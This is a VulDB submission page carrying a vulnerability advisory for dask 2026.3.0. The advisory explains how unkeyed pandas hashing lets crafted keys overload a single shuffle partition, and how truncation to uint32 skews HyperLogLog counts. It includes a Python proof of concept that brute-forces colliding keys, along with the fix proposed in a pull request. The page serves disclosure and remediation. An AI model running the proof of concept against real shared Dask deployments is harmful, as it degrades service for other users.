| Titel | dask 2026.3.0 Algorithmic Complexity / Hash Collision / Denial of Service |
|---|
| Beschreibung | ## Affected Component
`dask.dataframe`
## Affected Files / Functions
- `dask/dataframe/hyperloglog.py`
- `compute_hll_array`
- `compute_first_bit`
- `estimate_count`
- `dask/dataframe/shuffle.py`
- `partitioning_index`
- `dask/dataframe/backends.py`
- `hash_object_pandas`
- `dask/dataframe/multi.py`
- `_split_partition`
- hash-based join partitioning paths
## Affected Version
Confirmed on Dask `main` before PR #12401 and in release tag `2026.3.0`.
Potentially affects earlier versions using the same `pd.util.hash_pandas_object`
based HyperLogLog and shuffle routing code paths.
## Vulnerability Type
Algorithmic Complexity / Hash Collision / Denial of Service
## Suggested CWE
- CWE-400: Uncontrolled Resource Consumption
- CWE-328: Use of Weak Hash
- CWE-682: Incorrect Calculation
## Title
Dask `hash_pandas_object` collisions affect HLL accuracy and shuffle routing
## Summary
Dask DataFrame uses `pd.util.hash_pandas_object` in HyperLogLog-based
approximate cardinality estimation and hash-based shuffle/join partition
routing. The hash is deterministic and not collision-resistant. In the
HyperLogLog path, Dask currently truncates pandas 64-bit row hashes to
`uint32`, increasing avoidable pre-estimation collisions and causing
`nunique_approx()` to undercount crafted distinct rows. In shuffle and join
routing, attacker-controlled string/object keys can be selected to land in the
same partition bucket after modulo partitioning, causing partition skew and
possible availability degradation.
## Technical Details
`compute_hll_array` calls:
```python
hashes = hash_pandas_object(obj, index=False)
hashes = hashes.astype(np.uint32)
```
This truncates the 64-bit pandas hash output before the HLL register
calculation.
Shuffle routing uses logic equivalent to:
```python
hash_object_dispatch(df, index=False) % npartitions
```
Because `hash_pandas_object` is deterministic and unkeyed by default, an
attacker who controls input keys can preselect many distinct keys that route to
the same target partition.
## Impact
- Incorrect approximate uniqueness estimates in `nunique_approx()`
- Partition hotspotting during shuffle/join workloads
- Memory amplification on one partition/worker
- CPU saturation and long shuffle tails
- Worker failure or service degradation in adversarial shared environments
## Attack Vector
Remote or local, depending on deployment. The issue is exploitable when an
attacker can influence data processed by a Dask DataFrame workflow, especially
keys used in shuffle or join operations.
## Attack Complexity
Low, if the attacker can test or infer the partitioning behavior.
## Privileges Required
Low or none, depending on whether the attacker needs access to submit datasets
or jobs to the application using Dask.
## User Interaction
None.
## Confidentiality Impact
None.
## Integrity Impact
Low. HLL estimates can be made inaccurate; shuffle/join correctness is
generally preserved because final comparisons still use real keys.
## Availability Impact
High in adversarial workloads due to bucket hotspotting and worker/resource
exhaustion.
## Suggested CVSS v3.1
`CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H`
## Suggested Severity
High for availability in adversarial multi-tenant or user-input-driven Dask
deployments.
Medium for correctness/accuracy of approximate cardinality estimation.
## Proof of Concept
```python
import pandas as pd
from dask.dataframe.hyperloglog import compute_hll_array, estimate_count
from dask.dataframe.shuffle import partitioning_index
def collect_keys_for_bucket(npartitions, target_bucket, count):
keys = []
i = 0
while len(keys) < count:
key = f"attack_{i}"
frame = pd.DataFrame({"key": [key]})
bucket = int(partitioning_index(frame[["key"]], npartitions).iloc[0])
if bucket == target_bucket:
keys.append(key)
i += 1
return keys
rows = pd.DataFrame({"A": [1604090909467468979, 1], "B": [4, 3]})
row_hashes = pd.util.hash_pandas_object(rows, index=False)
state = compute_hll_array(rows, b=10)
print("row hashes:", row_hashes.tolist())
print("exact unique rows:", len(rows.drop_duplicates()))
print("HLL estimate:", float(estimate_count(state, b=10)))
npartitions = 16
target_bucket = 0
crafted_keys = collect_keys_for_bucket(npartitions, target_bucket, 64)
attack_df = pd.DataFrame(
{
"key": crafted_keys * 64,
"payload": range(len(crafted_keys) * 64),
}
)
counts = pd.Series(partitioning_index(attack_df[["key"]], npartitions)).value_counts()
print("target bucket ratio:", counts.get(target_bucket, 0) / len(attack_df))
```
## Expected Result
Distinct rows should not be collapsed before HLL estimation, and
attacker-selected keys should not be trivially concentrated into one partition
bucket in adversarial environments.
## Actual Result
Distinct rows can share the same pre-HLL row hash and produce an HLL estimate
close to 1 for 2 distinct rows. Distinct crafted keys can be selected so all
rows route to the same partition bucket.
## Solution / Mitigation
PR #12401 proposes:
- Preserve full `uint64` pandas hashes in HyperLogLog instead of truncating to
`uint32`
- Add `dataframe.shuffle.hash-key` configuration for pandas-backed
string/object hashing
- Pass the configured hash key through `hash_object_pandas`
- Add focused regression tests
## References
- Issue: https://github.com/dask/dask/issues/12403
- Pull Request: https://github.com/dask/dask/pull/12401
- Original superseded PR: https://github.com/dask/dask/pull/12336
- Related upstream CI issue: https://github.com/dask/dask/issues/12337
- VulDB Submission Policy: https://vuldb.com/kb/submission
## Disclosure Status
Public issue and pull request are open on GitHub. |
|---|
| Quelle | ⚠️ https://github.com/dask/dask/issues/12403 |
|---|
| Benutzer | Dem0 (UID 82596) |
|---|
| Einreichung | 16.05.2026 06:07 (vor 19 Tagen) |
|---|
| Moderieren | 02.06.2026 19:46 (18 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 368018 [dask bis 3.0 HLL hyperloglog.py nunique_approx Denial of Service] |
|---|
| Punkte | 20 |
|---|